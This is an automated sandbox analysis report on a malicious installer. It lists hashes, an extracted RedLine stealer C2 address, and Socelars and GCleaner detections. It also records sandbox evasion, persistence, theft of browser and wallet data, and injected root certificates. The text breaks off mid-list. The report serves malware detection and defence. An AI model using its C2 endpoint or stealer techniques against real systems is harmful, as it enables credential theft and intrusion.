Resubmissions
02-11-2021 06:54
211102-hpn1zsbhc2 1002-11-2021 06:42
211102-hgpmjsgggp 1001-11-2021 21:47
211101-1ncknsfgfm 10Analysis
-
max time kernel
475s -
max time network
28546s -
platform
windows7_x64 -
resource
win7-de-20210920 -
submitted
01-11-2021 21:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win7-en-20211014
Behavioral task
behavioral3
Sample
setup_x86_x64_install.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral5
Sample
setup_x86_x64_install.exe
Resource
win10-ja-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
b5b5fe52ed9ca7d47bfb857498fd684c
-
SHA1
9c17089a630141c9b4e13ef46ab334d46709fdb8
-
SHA256
6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b
-
SHA512
482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a
Malware Config
Extracted
redline
media0121
91.121.67.60:23325
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
resource yara_rule behavioral3/memory/2760-236-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral3/memory/2760-240-0x0000000000418D26-mapping.dmp family_redline behavioral3/memory/2760-234-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars Payload 2 IoCs
resource yara_rule behavioral3/files/0x000600000001226d-168.dat family_socelars behavioral3/files/0x000600000001226d-104.dat family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
resource yara_rule behavioral3/files/0x000600000001222b-70.dat aspack_v212_v242 behavioral3/files/0x000600000001222b-71.dat aspack_v212_v242 behavioral3/files/0x0007000000012213-72.dat aspack_v212_v242 behavioral3/files/0x0007000000012213-73.dat aspack_v212_v242 behavioral3/files/0x0006000000012233-76.dat aspack_v212_v242 behavioral3/files/0x0006000000012233-77.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 53 IoCs
pid Process 1916 setup_installer.exe 2028 setup_install.exe 968 Mon178e7a516181.exe 1360 Mon179f74c0ff3cf1f.exe 1820 Mon1708beae021a5ff.exe 1400 Mon17bffc2992eb3d.exe 1868 Mon173a360b525.exe 1748 DllHost.exe 544 Mon175e6c8b40064b8c8.exe 1680 Mon1727c156c4abcec.exe 972 Mon17870faab0.exe 1316 Mon17bbf11fdb575d.exe 2136 Mon174a6c5f1664f.exe 2176 Mon17a0d8ec302e.exe 2200 Mon17332e41e6b.exe 2212 Mon178d8e5d06822.exe 2272 cmd.exe 2316 Mon17afe24e0084db3.exe 2380 Mon17bbf11fdb575d.tmp 2484 Mon17bbf11fdb575d.exe 2760 Mon174a6c5f1664f.exe 836 6jZhRtW.EXe 2492 2113750.exe 2776 LzmwAqmV.exe 2160 435011.exe 704 2422769.exe 1668 DownFlSetup110.exe 2584 inst1.exe 2672 1019845.exe 2720 930791.exe 3016 400896.exe 3068 Soft1WW01.exe 2232 chrome.exe 2512 chrome2.exe 1764 WinHoster.exe 1464 search_hyperfs_206.exe 584 setup.exe 2448 Calculator Installation.exe 2816 zhanglijuan-game.exe 2684 chrome3.exe 2292 WerFault.exe 2940 LYCw0J.ExE 2704 kPBhgOaGQk.exe 2884 19172.exe 1064 LzmwAqmV.exe 2668 9782952807.exe 2460 8825514.exe 816 services64.exe 1800 8435183.exe 980 7989912.exe 1916 3361330.exe 2700 8282329.exe 2144 sihost64.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8435183.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8435183.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2422769.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2422769.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 435011.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 435011.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8825514.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8825514.exe -
Loads dropped DLL 64 IoCs
pid Process 648 setup_x86_x64_install.exe 1916 setup_installer.exe 1916 setup_installer.exe 1916 setup_installer.exe 1916 setup_installer.exe 1916 setup_installer.exe 1916 setup_installer.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 2028 setup_install.exe 548 cmd.exe 968 Mon178e7a516181.exe 968 Mon178e7a516181.exe 1196 cmd.exe 1196 cmd.exe 1768 cmd.exe 920 cmd.exe 920 cmd.exe 1672 wmiprvse.exe 1672 wmiprvse.exe 1360 Mon179f74c0ff3cf1f.exe 1360 Mon179f74c0ff3cf1f.exe 1808 cmd.exe 1792 cmd.exe 1164 cmd.exe 1640 cmd.exe 1640 cmd.exe 1400 Mon17bffc2992eb3d.exe 1400 Mon17bffc2992eb3d.exe 1584 cmd.exe 544 Mon175e6c8b40064b8c8.exe 1584 cmd.exe 544 Mon175e6c8b40064b8c8.exe 1680 Mon1727c156c4abcec.exe 1680 Mon1727c156c4abcec.exe 1748 DllHost.exe 1748 DllHost.exe 828 cmd.exe 828 cmd.exe 1452 explorer.exe 1332 cmd.exe 1316 Mon17bbf11fdb575d.exe 1316 Mon17bbf11fdb575d.exe 2176 Mon17a0d8ec302e.exe 2176 Mon17a0d8ec302e.exe 2136 Mon174a6c5f1664f.exe 2136 Mon174a6c5f1664f.exe 1748 DllHost.exe 972 Mon17870faab0.exe 972 Mon17870faab0.exe 1316 Mon17bbf11fdb575d.exe 2380 Mon17bbf11fdb575d.tmp 2380 Mon17bbf11fdb575d.tmp 2380 Mon17bbf11fdb575d.tmp 2380 Mon17bbf11fdb575d.tmp 2484 Mon17bbf11fdb575d.exe 2484 Mon17bbf11fdb575d.exe 2484 Mon17bbf11fdb575d.exe 2732 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 930791.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 435011.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2422769.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8825514.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8435183.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 110 freegeoip.app 112 freegeoip.app 113 freegeoip.app 116 freegeoip.app -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 2160 435011.exe 704 2422769.exe 2460 8825514.exe 1800 8435183.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2136 set thread context of 2760 2136 Mon174a6c5f1664f.exe 74 PID 1076 set thread context of 1452 1076 conhost.exe 160 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 6 IoCs
pid pid_target Process procid_target 2712 1360 WerFault.exe 41 2732 968 WerFault.exe 57 2292 972 WerFault.exe 48 2296 3068 WerFault.exe 98 948 2684 WerFault.exe 111 2780 1868 WerFault.exe 46 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Mon17a0d8ec302e.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 332 schtasks.exe -
Kills process with taskkill 7 IoCs
pid Process 2700 taskkill.exe 2892 taskkill.exe 2280 taskkill.exe 980 taskkill.exe 3452 taskkill.exe 2940 taskkill.exe 528 taskkill.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 Mon17870faab0.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon17332e41e6b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon17332e41e6b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon178d8e5d06822.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon17332e41e6b.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde Mon17870faab0.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mon17332e41e6b.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Mon178d8e5d06822.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Mon178d8e5d06822.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 992 powershell.exe 1668 DownFlSetup110.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2712 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2732 WerFault.exe 2176 Mon17a0d8ec302e.exe 2176 Mon17a0d8ec302e.exe 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not Found 1232 Process not 